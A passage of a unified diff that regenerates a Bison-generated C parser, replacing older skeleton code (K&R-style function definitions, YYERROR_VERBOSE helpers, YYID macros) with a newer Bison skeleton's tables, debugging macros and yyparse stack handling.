395, 395, 395, ++ 395, 395, 395, 395, 395, 395, 395, 395, 395, 395, ++ 395, 395, 395, 395, 395, 395, 395, 395, 395, 395, ++ 395, 395, 395, 396, 396, 397, 397, 398, 398, 399, ++ 399, 400, 400, 401, 401, 402, 402, 402, 402, 403, ++ 403, 404, 404, 405, 405, 406, 406, 407, 408, 408, ++ 408, 409, 409, 409, 409, 409, 409, 409, 409, 409, ++ 411, 410, 412, 410, 410, 414, 413, 413, 415, 415, ++ 417, 416, 416, 418, 419, 419, 420, 420, 421, 421, ++ 421, 421, 421, 422, 422, 423, 424, 424, 425, 425, ++ 425, 426, 426, 426, 426, 426, 426, 426, 426, 426, ++ 426, 426, 426, 426, 426, 426, 426, 426, 426, 426, ++ 426, 426, 426, 426, 426, 426, 426, 426, 426, 426, ++ 426, 426, 427, 427, 428, 428, 429, 429, 429 ++}; + +-/* Like YYERROR except do call yyerror. This remains here temporarily +- to ease the transition to the new meaning of YYERROR, for GCC. +- Once GCC version 2 has supplanted version 1, this can go. */ ++/* YYR2[RULE-NUM] -- Number of symbols on the right-hand side of rule RULE-NUM. */ ++static const yytype_int8 yyr2[] = ++{ ++ 0, 2, 1, 2, 0, 2, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 2, 1, 3, 1, ++ 3, 3, 2, 1, 3, 1, 3, 3, 2, 1, ++ 3, 1, 3, 3, 2, 1, 3, 1, 3, 3, ++ 3, 1, 3, 1, 3, 3, 2, 2, 3, 1, ++ 3, 3, 3, 5, 0, 3, 4, 1, 2, 1, ++ 1, 1, 1, 2, 0, 5, 0, 6, 4, 1, ++ 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, ++ 14, 0, 5, 0, 3, 1, 2, 0, 5, 1, ++ 2, 1, 2, 1, 3, 1, 3, 3, 0, 5, ++ 1, 2, 1, 0, 5, 1, 2, 3, 4, 1, ++ 3, 1, 3, 0, 1, 3, 1, 3, 3, 3, ++ 3, 3, 2, 1, 3, 1, 3, 3, 2, 1, ++ 3, 1, 3, 3, 2, 1, 3, 1, 3, 3, ++ 3, 1, 3, 1, 3, 3, 0, 4, 1, 2, ++ 1, 1, 1, 3, 1, 3, 1, 3, 3, 0, ++ 4, 1, 2, 1, 1, 1, 3, 3, 0, 3, ++ 3, 1, 3, 3, 3, 3, 3, 3, 3, 3, ++ 3, 3, 3, 0, 4, 1, 2, 1, 1, 1, ++ 1, 1, 1, 0, 1, 2, 1, 3, 1, 3, ++ 3, 3, 2, 2, 1, 3, 1, 3, 3, 0, ++ 2, 0, 2, 0, 2, 2, 2, 2, 2, 2, ++ 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, ++ 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, ++ 2, 2, 2, 2, 3, 1, 3, 3, 3, 0, ++ 1, 3, 1, 3, 3, 3, 0, 1, 3, 1, ++ 3, 1, 3, 3, 3, 4, 2, 1, 2, 0, ++ 9, 0, 1, 1, 0, 1, 0, 1, 0, 1, ++ 1, 2, 1, 1, 4, 0, 1, 0, 2, 0, ++ 2, 1, 3, 1, 1, 1, 1, 1, 1, 0, ++ 1, 1, 1, 1, 1, 1, 3, 0, 3, 2, ++ 1, 1, 3, 1, 1, 1, 1, 4, 2, 1, ++ 1, 1, 1, 1, 1, 0, 1, 3, 6, 12, ++ 0, 0, 8, 0, 3, 4, 0, 0, 8, 0, ++ 2, 1, 3, 2, 0, 1, 1, 1, 0, 3, ++ 0, 1, 2, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 2, 2, 2, 3, 3, 3, 2, 3, 3, ++ 1, 3, 3, 3, 3, 0, 4, 1, 2, 1, ++ 1, 1, 1, 1, 0, 1, 0, 3, 1, 11, ++ 0, 3, 1, 11, 0, 0, 6, 0, 0, 7, ++ 17, 7, 17, 16, 1, 1, 1, 1, 1, 1, ++ 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, ++ 2, 2, 3, 3, 1, 2, 2, 1, 2, 2, ++ 2, 1, 2, 0, 1, 0, 1, 0, 2, 0, ++ 3, 1, 3, 1, 3, 1, 5, 1, 1, 0, ++ 2, 0, 2, 0, 2, 0, 2, 1, 0, 1, ++ 3, 4, 4, 4, 3, 3, 6, 6, 3, 2, ++ 0, 3, 0, 3, 1, 0, 3, 1, 1, 1, ++ 0, 3, 1, 8, 0, 3, 1, 2, 1, 1, ++ 2, 2, 2, 4, 3, 3, 0, 1, 0, 3, ++ 2, 1, 4, 2, 2, 1, 1, 2, 1, 1, ++ 2, 2, 3, 1, 1, 1, 2, 2, 1, 1, ++ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ++ 1, 1, 1, 3, 0, 4, 0, 1, 3 ++}; + +-#define YYFAIL goto yyerrlab + +-#define YYRECOVERING() (!!yyerrstatus) ++enum { YYENOMEM = -2 }; + +-#define YYBACKUP(Token, Value) \ +-do \ +- if (yychar == YYEMPTY && yylen == 1) \ +- { \ +- yychar = (Token); \ +- yylval = (Value); \ +- yytoken = YYTRANSLATE (yychar); \ +- YYPOPSTACK (1); \ +- goto yybackup; \ +- } \ +- else \ +- { \ +- yyerror (YY_("syntax error: cannot back up")); \ +- YYERROR; \ +- } \ +-while (YYID (0)) +- +- +-#define YYTERROR 1 +-#define YYERRCODE 256 +- +- +-/* YYLLOC_DEFAULT -- Set CURRENT to span from RHS[1] to RHS[N]. +- If N is 0, then set CURRENT to the empty location which ends +- the previous symbol: RHS[0] (always defined). */ +- +-#define YYRHSLOC(Rhs, K) ((Rhs)[K]) +-#ifndef YYLLOC_DEFAULT +-# define YYLLOC_DEFAULT(Current, Rhs, N) \ +- do \ +- if (YYID (N)) \ +- { \ +- (Current).first_line = YYRHSLOC (Rhs, 1).first_line; \ +- (Current).first_column = YYRHSLOC (Rhs, 1).first_column; \ +- (Current).last_line = YYRHSLOC (Rhs, N).last_line; \ +- (Current).last_column = YYRHSLOC (Rhs, N).last_column; \ +- } \ +- else \ +- { \ +- (Current).first_line = (Current).last_line = \ +- YYRHSLOC (Rhs, 0).last_line; \ +- (Current).first_column = (Current).last_column = \ +- YYRHSLOC (Rhs, 0).last_column; \ +- } \ +- while (YYID (0)) +-#endif ++#define yyerrok (yyerrstatus = 0) ++#define yyclearin (yychar = YYEMPTY) + ++#define YYACCEPT goto yyacceptlab ++#define YYABORT goto yyabortlab ++#define YYERROR goto yyerrorlab ++#define YYNOMEM goto yyexhaustedlab + +-/* YY_LOCATION_PRINT -- Print the location on the stream. +- This macro was not mandated originally: define only if we know +- we won't break user code: when these are the locations we know. */ +- +-#ifndef YY_LOCATION_PRINT +-# if defined YYLTYPE_IS_TRIVIAL && YYLTYPE_IS_TRIVIAL +-# define YY_LOCATION_PRINT(File, Loc) \ +- fprintf (File, "%d.%d-%d.%d", \ +- (Loc).first_line, (Loc).first_column, \ +- (Loc).last_line, (Loc).last_column) +-# else +-# define YY_LOCATION_PRINT(File, Loc) ((void) 0) +-# endif +-#endif + ++#define YYRECOVERING() (!!yyerrstatus) + +-/* YYLEX -- calling `yylex' with the right arguments. */ ++#define YYBACKUP(Token, Value) \ ++ do \ ++ if (yychar == YYEMPTY) \ ++ { \ ++ yychar = (Token); \ ++ yylval = (Value); \ ++ YYPOPSTACK (yylen); \ ++ yystate = *yyssp; \ ++ goto yybackup; \ ++ } \ ++ else \ ++ { \ ++ yyerror (YY_("syntax error: cannot back up")); \ ++ YYERROR; \ ++ } \ ++ while (0) ++ ++/* Backward compatibility with an undocumented macro. ++ Use YYerror or YYUNDEF. */ ++#define YYERRCODE YYUNDEF + +-#ifdef YYLEX_PARAM +-# define YYLEX yylex (YYLEX_PARAM) +-#else +-# define YYLEX yylex () +-#endif + + /* Enable debugging if requested. */ + #if YYDEBUG +@@ -2321,80 +2213,58 @@ while (YYID (0)) + # define YYFPRINTF fprintf + # endif + +-# define YYDPRINTF(Args) \ +-do { \ +- if (yydebug) \ +- YYFPRINTF Args; \ +-} while (YYID (0)) +- +-# define YY_SYMBOL_PRINT(Title, Type, Value, Location) \ +-do { \ +- if (yydebug) \ +- { \ +- YYFPRINTF (stderr, "%s ", Title); \ +- yy_symbol_print (stderr, \ +- Type, Value); \ +- YYFPRINTF (stderr, "\n"); \ +- } \ +-} while (YYID (0)) +- +- +-/*--------------------------------. +-| Print this symbol on YYOUTPUT. | +-`--------------------------------*/ +- +-/*ARGSUSED*/ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static void +-yy_symbol_value_print (FILE *yyoutput, int yytype, YYSTYPE const * const yyvaluep) +-#else ++# define YYDPRINTF(Args) \ ++do { \ ++ if (yydebug) \ ++ YYFPRINTF Args; \ ++} while (0) ++ ++ ++ ++ ++# define YY_SYMBOL_PRINT(Title, Kind, Value, Location) \ ++do { \ ++ if (yydebug) \ ++ { \ ++ YYFPRINTF (stderr, "%s ", Title); \ ++ yy_symbol_print (stderr, \ ++ Kind, Value); \ ++ YYFPRINTF (stderr, "\n"); \ ++ } \ ++} while (0) ++ ++ ++/*-----------------------------------. ++| Print this symbol's value on YYO. | ++`-----------------------------------*/ ++ + static void +-yy_symbol_value_print (yyoutput, yytype, yyvaluep) +- FILE *yyoutput; +- int yytype; +- YYSTYPE const * const yyvaluep; +-#endif ++yy_symbol_value_print (FILE *yyo, ++ yysymbol_kind_t yykind, YYSTYPE const * const yyvaluep) + { ++ FILE *yyoutput = yyo; ++ YY_USE (yyoutput); + if (!yyvaluep) + return; +-# ifdef YYPRINT +- if (yytype < YYNTOKENS) +- YYPRINT (yyoutput, yytoknum[yytype], *yyvaluep); +-# else +- YYUSE (yyoutput); +-# endif +- switch (yytype) +- { +- default: +- break; +- } ++ YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN ++ YY_USE (yykind); ++ YY_IGNORE_MAYBE_UNINITIALIZED_END + } + + +-/*--------------------------------. +-| Print this symbol on YYOUTPUT. | +-`--------------------------------*/ ++/*---------------------------. ++| Print this symbol on YYO. | ++`---------------------------*/ + +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static void +-yy_symbol_print (FILE *yyoutput, int yytype, YYSTYPE const * const yyvaluep) +-#else + static void +-yy_symbol_print (yyoutput, yytype, yyvaluep) +- FILE *yyoutput; +- int yytype; +- YYSTYPE const * const yyvaluep; +-#endif ++yy_symbol_print (FILE *yyo, ++ yysymbol_kind_t yykind, YYSTYPE const * const yyvaluep) + { +- if (yytype < YYNTOKENS) +- YYFPRINTF (yyoutput, "token %s (", yytname[yytype]); +- else +- YYFPRINTF (yyoutput, "nterm %s (", yytname[yytype]); ++ YYFPRINTF (yyo, "%s %s (", ++ yykind < YYNTOKENS ? "token" : "nterm", yysymbol_name (yykind)); + +- yy_symbol_value_print (yyoutput, yytype, yyvaluep); +- YYFPRINTF (yyoutput, ")"); ++ yy_symbol_value_print (yyo, yykind, yyvaluep); ++ YYFPRINTF (yyo, ")"); + } + + /*------------------------------------------------------------------. +@@ -2402,80 +2272,68 @@ yy_symbol_print (yyoutput, yytype, yyval + | TOP (included). | + `------------------------------------------------------------------*/ + +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static void +-yy_stack_print (yytype_int16 *bottom, yytype_int16 *top) +-#else + static void +-yy_stack_print (bottom, top) +- yytype_int16 *bottom; +- yytype_int16 *top; +-#endif ++yy_stack_print (yy_state_t *yybottom, yy_state_t *yytop) + { + YYFPRINTF (stderr, "Stack now"); +- for (; bottom <= top; ++bottom) +- YYFPRINTF (stderr, " %d", *bottom); ++ for (; yybottom <= yytop; yybottom++) ++ { ++ int yybot = *yybottom; ++ YYFPRINTF (stderr, " %d", yybot); ++ } + YYFPRINTF (stderr, "\n"); + } + +-# define YY_STACK_PRINT(Bottom, Top) \ +-do { \ +- if (yydebug) \ +- yy_stack_print ((Bottom), (Top)); \ +-} while (YYID (0)) ++# define YY_STACK_PRINT(Bottom, Top) \ ++do { \ ++ if (yydebug) \ ++ yy_stack_print ((Bottom), (Top)); \ ++} while (0) + + + /*------------------------------------------------. + | Report that the YYRULE is going to be reduced. | + `------------------------------------------------*/ + +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) + static void +-yy_reduce_print (YYSTYPE *yyvsp, int yyrule) +-#else +-static void +-yy_reduce_print (yyvsp, yyrule) +- YYSTYPE *yyvsp; +- int yyrule; +-#endif ++yy_reduce_print (yy_state_t *yyssp, YYSTYPE *yyvsp, ++ int yyrule) + { ++ int yylno = yyrline[yyrule]; + int yynrhs = yyr2[yyrule]; + int yyi; +- unsigned long int yylno = yyrline[yyrule]; +- YYFPRINTF (stderr, "Reducing stack by rule %d (line %lu):\n", +- yyrule - 1, yylno); ++ YYFPRINTF (stderr, "Reducing stack by rule %d (line %d):\n", ++ yyrule - 1, yylno); + /* The symbols being reduced. */ + for (yyi = 0; yyi < yynrhs; yyi++) + { +- fprintf (stderr, " $%d = ", yyi + 1); +- yy_symbol_print (stderr, yyrhs[yyprhs[yyrule] + yyi], +- &(yyvsp[(yyi + 1) - (yynrhs)]) +- ); +- fprintf (stderr, "\n"); ++ YYFPRINTF (stderr, " $%d = ", yyi + 1); ++ yy_symbol_print (stderr, ++ YY_ACCESSING_SYMBOL (+yyssp[yyi + 1 - yynrhs]), ++ &yyvsp[(yyi + 1) - (yynrhs)]); ++ YYFPRINTF (stderr, "\n"); + } + } + +-# define YY_REDUCE_PRINT(Rule) \ +-do { \ +- if (yydebug) \ +- yy_reduce_print (yyvsp, Rule); \ +-} while (YYID (0)) ++# define YY_REDUCE_PRINT(Rule) \ ++do { \ ++ if (yydebug) \ ++ yy_reduce_print (yyssp, yyvsp, Rule); \ ++} while (0) + + /* Nonzero means print parse trace. It is left uninitialized so that + multiple parsers can coexist. */ + int yydebug; + #else /* !YYDEBUG */ +-# define YYDPRINTF(Args) +-# define YY_SYMBOL_PRINT(Title, Type, Value, Location) ++# define YYDPRINTF(Args) ((void) 0) ++# define YY_SYMBOL_PRINT(Title, Kind, Value, Location) + # define YY_STACK_PRINT(Bottom, Top) + # define YY_REDUCE_PRINT(Rule) + #endif /* !YYDEBUG */ + + + /* YYINITDEPTH -- initial size of the parser's stacks. */ +-#ifndef YYINITDEPTH ++#ifndef YYINITDEPTH + # define YYINITDEPTH 200 + #endif + +@@ -2490,478 +2348,219 @@ int yydebug; + # define YYMAXDEPTH 10000 + #endif + +- + +-#if YYERROR_VERBOSE + +-# ifndef yystrlen +-# if defined __GLIBC__ && defined _STRING_H +-# define yystrlen strlen +-# else +-/* Return the length of YYSTR. */ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static YYSIZE_T +-yystrlen (const char *yystr) +-#else +-static YYSIZE_T +-yystrlen (yystr) +- const char *yystr; +-#endif +-{ +- YYSIZE_T yylen; +- for (yylen = 0; yystr[yylen]; yylen++) +- continue; +- return yylen; +-} +-# endif +-# endif + +-# ifndef yystpcpy +-# if defined __GLIBC__ && defined _STRING_H && defined _GNU_SOURCE +-# define yystpcpy stpcpy +-# else +-/* Copy YYSRC to YYDEST, returning the address of the terminating '\0' in +- YYDEST. */ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static char * +-yystpcpy (char *yydest, const char *yysrc) +-#else +-static char * +-yystpcpy (yydest, yysrc) +- char *yydest; +- const char *yysrc; +-#endif +-{ +- char *yyd = yydest; +- const char *yys = yysrc; + +- while ((*yyd++ = *yys++) != '\0') +- continue; +- +- return yyd - 1; +-} +-# endif +-# endif +- +-# ifndef yytnamerr +-/* Copy to YYRES the contents of YYSTR after stripping away unnecessary +- quotes and backslashes, so that it's suitable for yyerror. The +- heuristic is that double-quoting is unnecessary unless the string +- contains an apostrophe, a comma, or backslash (other than +- backslash-backslash). YYSTR is taken from yytname. If YYRES is +- null, do not copy; instead, return the length of what the result +- would have been. */ +-static YYSIZE_T +-yytnamerr (char *yyres, const char *yystr) +-{ +- if (*yystr == '"') +- { +- YYSIZE_T yyn = 0; +- char const *yyp = yystr; +- +- for (;;) +- switch (*++yyp) +- { +- case '\'': +- case ',': +- goto do_not_strip_quotes; +- +- case '\\': +- if (*++yyp != '\\') +- goto do_not_strip_quotes; +- /* Fall through. */ +- default: +- if (yyres) +- yyres[yyn] = *yyp; +- yyn++; +- break; +- +- case '"': +- if (yyres) +- yyres[yyn] = '\0'; +- return yyn; +- } +- do_not_strip_quotes: ; +- } +- +- if (! yyres) +- return yystrlen (yystr); +- +- return yystpcpy (yyres, yystr) - yyres; +-} +-# endif +- +-/* Copy into YYRESULT an error message about the unexpected token +- YYCHAR while in state YYSTATE. Return the number of bytes copied, +- including the terminating null byte. If YYRESULT is null, do not +- copy anything; just return the number of bytes that would be +- copied. As a special case, return 0 if an ordinary "syntax error" +- message will do. Return YYSIZE_MAXIMUM if overflow occurs during +- size calculation. */ +-static YYSIZE_T +-yysyntax_error (char *yyresult, int yystate, int yychar) +-{ +- int yyn = yypact[yystate]; +- +- if (! (YYPACT_NINF < yyn && yyn <= YYLAST)) +- return 0; +- else +- { +- int yytype = YYTRANSLATE (yychar); +- YYSIZE_T yysize0 = yytnamerr (0, yytname[yytype]); +- YYSIZE_T yysize = yysize0; +- YYSIZE_T yysize1; +- int yysize_overflow = 0; +- enum { YYERROR_VERBOSE_ARGS_MAXIMUM = 5 }; +- char const *yyarg[YYERROR_VERBOSE_ARGS_MAXIMUM]; +- int yyx; +- +-# if 0 +- /* This is so xgettext sees the translatable formats that are +- constructed on the fly. */ +- YY_("syntax error, unexpected %s"); +- YY_("syntax error, unexpected %s, expecting %s"); +- YY_("syntax error, unexpected %s, expecting %s or %s"); +- YY_("syntax error, unexpected %s, expecting %s or %s or %s"); +- YY_("syntax error, unexpected %s, expecting %s or %s or %s or %s"); +-# endif +- char *yyfmt; +- char const *yyf; +- static char const yyunexpected[] = "syntax error, unexpected %s"; +- static char const yyexpecting[] = ", expecting %s"; +- static char const yyor[] = " or %s"; +- char yyformat[sizeof yyunexpected +- + sizeof yyexpecting - 1 +- + ((YYERROR_VERBOSE_ARGS_MAXIMUM - 2) +- * (sizeof yyor - 1))]; +- char const *yyprefix = yyexpecting; +- +- /* Start YYX at -YYN if negative to avoid negative indexes in +- YYCHECK. */ +- int yyxbegin = yyn < 0 ? -yyn : 0; +- +- /* Stay within bounds of both yycheck and yytname. */ +- int yychecklim = YYLAST - yyn + 1; +- int yyxend = yychecklim < YYNTOKENS ? yychecklim : YYNTOKENS; +- int yycount = 1; +- +- yyarg[0] = yytname[yytype]; +- yyfmt = yystpcpy (yyformat, yyunexpected); +- +- for (yyx = yyxbegin; yyx < yyxend; ++yyx) +- if (yycheck[yyx + yyn] == yyx && yyx != YYTERROR) +- { +- if (yycount == YYERROR_VERBOSE_ARGS_MAXIMUM) +- { +- yycount = 1; +- yysize = yysize0; +- yyformat[sizeof yyunexpected - 1] = '\0'; +- break; +- } +- yyarg[yycount++] = yytname[yyx]; +- yysize1 = yysize + yytnamerr (0, yytname[yyx]); +- yysize_overflow |= (yysize1 < yysize); +- yysize = yysize1; +- yyfmt = yystpcpy (yyfmt, yyprefix); +- yyprefix = yyor; +- } +- +- yyf = YY_(yyformat); +- yysize1 = yysize + yystrlen (yyf); +- yysize_overflow |= (yysize1 < yysize); +- yysize = yysize1; +- +- if (yysize_overflow) +- return YYSIZE_MAXIMUM; +- +- if (yyresult) +- { +- /* Avoid sprintf, as that infringes on the user's name space. +- Don't have undefined behavior even if the translation +- produced a string with the wrong number of "%s"s. */ +- char *yyp = yyresult; +- int yyi = 0; +- while ((*yyp = *yyf) != '\0') +- { +- if (*yyp == '%' && yyf[1] == 's' && yyi < yycount) +- { +- yyp += yytnamerr (yyp, yyarg[yyi++]); +- yyf += 2; +- } +- else +- { +- yyp++; +- yyf++; +- } +- } +- } +- return yysize; +- } +-} +-#endif /* YYERROR_VERBOSE */ +- + + /*-----------------------------------------------. + | Release the memory associated to this symbol. | + `-----------------------------------------------*/ + +-/*ARGSUSED*/ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static void +-yydestruct (const char *yymsg, int yytype, YYSTYPE *yyvaluep) +-#else + static void +-yydestruct (yymsg, yytype, yyvaluep) +- const char *yymsg; +- int yytype; +- YYSTYPE *yyvaluep; +-#endif ++yydestruct (const char *yymsg, ++ yysymbol_kind_t yykind, YYSTYPE *yyvaluep) + { +- YYUSE (yyvaluep); +- ++ YY_USE (yyvaluep); + if (!yymsg) + yymsg = "Deleting"; +- YY_SYMBOL_PRINT (yymsg, yytype, yyvaluep, yylocationp); +- +- switch (yytype) +- { ++ YY_SYMBOL_PRINT (yymsg, yykind, yyvaluep, yylocationp); + +- default: +- break; +- } ++ YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN ++ YY_USE (yykind); ++ YY_IGNORE_MAYBE_UNINITIALIZED_END + } +- +- +-/* Prevent warnings from -Wmissing-prototypes. */ +- +-#ifdef YYPARSE_PARAM +-#if defined __STDC__ || defined __cplusplus +-int yyparse (void *YYPARSE_PARAM); +-#else +-int yyparse (); +-#endif +-#else /* ! YYPARSE_PARAM */ +-#if defined __STDC__ || defined __cplusplus +-int yyparse (void); +-#else +-int yyparse (); +-#endif +-#endif /* ! YYPARSE_PARAM */ +- + + +-/* The look-ahead symbol. */ ++/* Lookahead token kind. */ + int yychar; + +-/* The semantic value of the look-ahead symbol. */ ++/* The semantic value of the lookahead symbol. */ + YYSTYPE yylval; +- + /* Number of syntax errors so far. */ + int yynerrs; + + + ++ + /*----------. + | yyparse. | + `----------*/ + +-#ifdef YYPARSE_PARAM +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-int +-yyparse (void *YYPARSE_PARAM) +-#else +-int +-yyparse (YYPARSE_PARAM) +- void *YYPARSE_PARAM; +-#endif +-#else /* ! YYPARSE_PARAM */ +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) + int + yyparse (void) +-#else +-int +-yyparse () +- +-#endif +-#endif + { +- +- int yystate; ++ yy_state_fast_t yystate = 0; ++ /* Number of tokens to shift before error messages enabled. */ ++ int yyerrstatus = 0; ++ ++ /* Refer to the stacks through separate pointers, to allow yyoverflow ++ to reallocate them elsewhere. */ ++ ++ /* Their size. */ ++ YYPTRDIFF_T yystacksize = YYINITDEPTH; ++ ++ /* The state stack: array, bottom, top. */ ++ yy_state_t yyssa[YYINITDEPTH]; ++ yy_state_t *yyss = yyssa; ++ yy_state_t *yyssp = yyss; ++ ++ /* The semantic value stack: array, bottom, top. */ ++ YYSTYPE yyvsa[YYINITDEPTH]; ++ YYSTYPE *yyvs = yyvsa; ++ YYSTYPE *yyvsp = yyvs; ++ + int yyn; ++ /* The return value of yyparse. */ + int yyresult; +- /* Number of tokens to shift before error messages enabled. */ +- int yyerrstatus; +- /* Look-ahead token as an internal (translated) token number. */ +- int yytoken = 0; +-#if YYERROR_VERBOSE +- /* Buffer for error messages, and its allocated size. */ +- char yymsgbuf[128]; +- char *yymsg = yymsgbuf; +- YYSIZE_T yymsg_alloc = sizeof yymsgbuf; +-#endif +- +- /* Three stacks and their tools: +- `yyss': related to states, +- `yyvs': related to semantic values, +- `yyls': related to locations. +- +- Refer to the stacks thru separate pointers, to allow yyoverflow +- to reallocate them elsewhere. */ +- +- /* The state stack. */ +- yytype_int16 yyssa[YYINITDEPTH]; +- yytype_int16 *yyss = yyssa; +- yytype_int16 *yyssp; +- +- /* The semantic value stack. */ +- YYSTYPE yyvsa[YYINITDEPTH]; +- YYSTYPE *yyvs = yyvsa; +- YYSTYPE *yyvsp; +- +- +- +-#define YYPOPSTACK(N) (yyvsp -= (N), yyssp -= (N)) +- +- YYSIZE_T yystacksize = YYINITDEPTH; +- ++ /* Lookahead symbol kind. */ ++ yysymbol_kind_t yytoken = YYSYMBOL_YYEMPTY; + /* The variables used to return semantic value and location from the + action routines. */ + YYSTYPE yyval; + + ++ ++#define YYPOPSTACK(N) (yyvsp -= (N), yyssp -= (N)) ++ + /* The number of symbols on the RHS of the reduced rule. + Keep to zero when no symbol should be popped. */ + int yylen = 0; + + YYDPRINTF ((stderr, "Starting parse\n")); + +- yystate = 0; +- yyerrstatus = 0; +- yynerrs = 0; +- yychar = YYEMPTY; /* Cause a token to be read. */ +- +- /* Initialize stack pointers. +- Waste one element of value and location stack +- so that they stay on the same level as the state stack. +- The wasted elements are never initialized. */ +- +- yyssp = yyss; +- yyvsp = yyvs; ++ yychar = YYEMPTY; /* Cause a token to be read. */ + + goto yysetstate; + ++ + /*------------------------------------------------------------. +-| yynewstate -- Push a new state, which is found in yystate. | ++| yynewstate -- push a new state, which is found in yystate. | + `------------------------------------------------------------*/ +- yynewstate: ++yynewstate: + /* In all cases, when you get here, the value and location stacks + have just been pushed. So pushing a state here evens the stacks. */ + yyssp++; + +- yysetstate: +- *yyssp = yystate; ++ ++/*--------------------------------------------------------------------. ++| yysetstate -- set current state (the top of the stack) to yystate. | ++`--------------------------------------------------------------------*/ ++yysetstate: ++ YYDPRINTF ((stderr, "Entering state %d\n", yystate)); ++ YY_ASSERT (0 <= yystate && yystate < YYNSTATES); ++ YY_IGNORE_USELESS_CAST_BEGIN ++ *yyssp = YY_CAST (yy_state_t, yystate); ++ YY_IGNORE_USELESS_CAST_END ++ YY_STACK_PRINT (yyss, yyssp); + + if (yyss + yystacksize - 1 <= yyssp) ++#if !defined yyoverflow && !defined YYSTACK_RELOCATE ++ YYNOMEM; ++#else + { + /* Get the current used size of the three stacks, in elements. */ +- YYSIZE_T yysize = yyssp - yyss + 1; ++ YYPTRDIFF_T yysize = yyssp - yyss + 1; + +-#ifdef yyoverflow ++# if defined yyoverflow + { +- /* Give user a chance to reallocate the stack. Use copies of +- these so that the &'s don't force the real ones into +- memory. */ +- YYSTYPE *yyvs1 = yyvs; +- yytype_int16 *yyss1 = yyss; +- +- +- /* Each stack pointer address is followed by the size of the +- data in use in that stack, in bytes. This used to be a +- conditional around just the two extra args, but that might +- be undefined if yyoverflow is a macro. */ +- yyoverflow (YY_("memory exhausted"), +- &yyss1, yysize * sizeof (*yyssp), +- &yyvs1, yysize * sizeof (*yyvsp), +- +- &yystacksize); +- +- yyss = yyss1; +- yyvs = yyvs1; ++ /* Give user a chance to reallocate the stack. Use copies of ++ these so that the &'s don't force the real ones into ++ memory. */ ++ yy_state_t *yyss1 = yyss; ++ YYSTYPE *yyvs1 = yyvs; ++ ++ /* Each stack pointer address is followed by the size of the ++ data in use in that stack, in bytes. This used to be a ++ conditional around just the two extra args, but that might ++ be undefined if yyoverflow is a macro. */ ++ yyoverflow (YY_("memory exhausted"), ++ &yyss1, yysize * YYSIZEOF (*yyssp), ++ &yyvs1, yysize * YYSIZEOF (*yyvsp), ++ &yystacksize); ++ yyss = yyss1; ++ yyvs = yyvs1; + } +-#else /* no yyoverflow */ +-# ifndef YYSTACK_RELOCATE +- goto yyexhaustedlab; +-# else ++# else /* defined YYSTACK_RELOCATE */ + /* Extend the stack our own way. */ + if (YYMAXDEPTH <= yystacksize) +- goto yyexhaustedlab; ++ YYNOMEM; + yystacksize *= 2; + if (YYMAXDEPTH < yystacksize) +- yystacksize = YYMAXDEPTH; ++ yystacksize = YYMAXDEPTH; + + { +- yytype_int16 *yyss1 = yyss; +- union yyalloc *yyptr = +- (union yyalloc *) YYSTACK_ALLOC (YYSTACK_BYTES (yystacksize)); +- if (! yyptr) +- goto yyexhaustedlab; +- YYSTACK_RELOCATE (yyss); +- YYSTACK_RELOCATE (yyvs); +- ++ yy_state_t *yyss1 = yyss; ++ union yyalloc *yyptr = ++ YY_CAST (union yyalloc *, ++ YYSTACK_ALLOC (YY_CAST (YYSIZE_T, YYSTACK_BYTES (yystacksize)))); ++ if (! yyptr) ++ YYNOMEM; ++ YYSTACK_RELOCATE (yyss_alloc, yyss); ++ YYSTACK_RELOCATE (yyvs_alloc, yyvs); + # undef YYSTACK_RELOCATE +- if (yyss1 != yyssa) +- YYSTACK_FREE (yyss1); ++ if (yyss1 != yyssa) ++ YYSTACK_FREE (yyss1); + } + # endif +-#endif /* no yyoverflow */ + + yyssp = yyss + yysize - 1; + yyvsp = yyvs + yysize - 1; + +- +- YYDPRINTF ((stderr, "Stack size increased to %lu\n", +- (unsigned long int) yystacksize)); ++ YY_IGNORE_USELESS_CAST_BEGIN ++ YYDPRINTF ((stderr, "Stack size increased to %ld\n", ++ YY_CAST (long, yystacksize))); ++ YY_IGNORE_USELESS_CAST_END + + if (yyss + yystacksize - 1 <= yyssp) +- YYABORT; ++ YYABORT; + } ++#endif /* !defined yyoverflow && !defined YYSTACK_RELOCATE */ + +- YYDPRINTF ((stderr, "Entering state %d\n", yystate)); ++ ++ if (yystate == YYFINAL) ++ YYACCEPT; + + goto yybackup; + ++ + /*-----------. + | yybackup. | + `-----------*/ + yybackup: +- + /* Do appropriate processing given the current state. Read a +- look-ahead token if we need one and don't already have one. */ ++ lookahead token if we need one and don't already have one. */ + +- /* First try to decide what to do without reference to look-ahead token. */ ++ /* First try to decide what to do without reference to lookahead token. */ + yyn = yypact[yystate]; +- if (yyn == YYPACT_NINF) ++ if (yypact_value_is_default (yyn)) + goto 